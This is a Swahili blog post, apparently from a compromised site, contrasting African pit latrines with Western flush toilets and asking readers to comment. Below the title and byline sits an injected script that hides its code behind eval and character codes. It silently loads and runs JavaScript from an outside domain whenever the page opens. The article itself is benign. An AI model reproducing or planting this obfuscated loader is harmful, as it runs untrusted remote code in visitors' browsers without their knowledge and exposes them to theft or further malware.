Recent Comments

VYOO VYETU NA VYOO VYAO ANGALIA HAPA TOFAUTI ILIYOPO

By Mwafrika Aug 18, 2023
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Kwa muda mrefu Bara la Africa tumekua na utamaduni wetu katika sehemu mbalimbali ikiwemo vyakula,mavazi hata aina ya maisha yetu,laikini sasa leo hii wengi wetu tumekua tukiiga utamaduni wa magharibi jambo ambalo sio baya kama kinachoigwa kinafaida ila kama sio kizuri basi hakitufai.

Sasa leo nimeona nikuletee tofauti ya vyoo vyao(vya kisasa)na vyoo vyetu(vya kienyeji au vya kikwetukwetu)sasa ukiangalia vyoo vyao utaona tofauti kubwa sana hasa ukiingia ndani kuanzia mazingira mpaka vitendea kazi.

Vyoo vyetu bwana ukiangalia kwenye picha hapo chini inakuonyesha kwanza ni Tundu na halina mbwembwe(choo cha shimo)na pia utaona maji ni kidogo sana au uchague utumie majani kama uonavyo usicheke huu ndio ukweli na uhalisia wetu Afrika kabla ya kuletewa ustaarabu mwingine.

Ok njoo uone sasa choo Chao wao kilivyo yaani ni kama sehemu ya kulalia na ukiwa ndio siku yako ya kwanza unakitumia utaona kama wanamatumizi mabaya ya pesa au ni kufuru kwa Mwenyezimungu ila sio ni uboreshaji na kukufanya mtumiaji wa choo usichoke wala usichukie kukaa chooni.

  1. Chooni sisi huwa tunafikiria ni sehemu ya kwenda kujisaidia tu lakini ni zaidi ya kujisaidia au unaweza kusema ni sehemu ya starehe pia,mfano tu nakupa hii usipuuze ukienda chooni kujisaidia relax hasa uwe kwenye choo kizuri hapo utajua kuwa ni kujisaidia tu au ni sehemu ya starehe pia.

Sasa baada ya kusoma makalu hii fupi andika jumbe yako hapa tumble wewe unazani chooni panatakiwa paweje na je matumizi ya choo ni nini?asante kwa kusoma.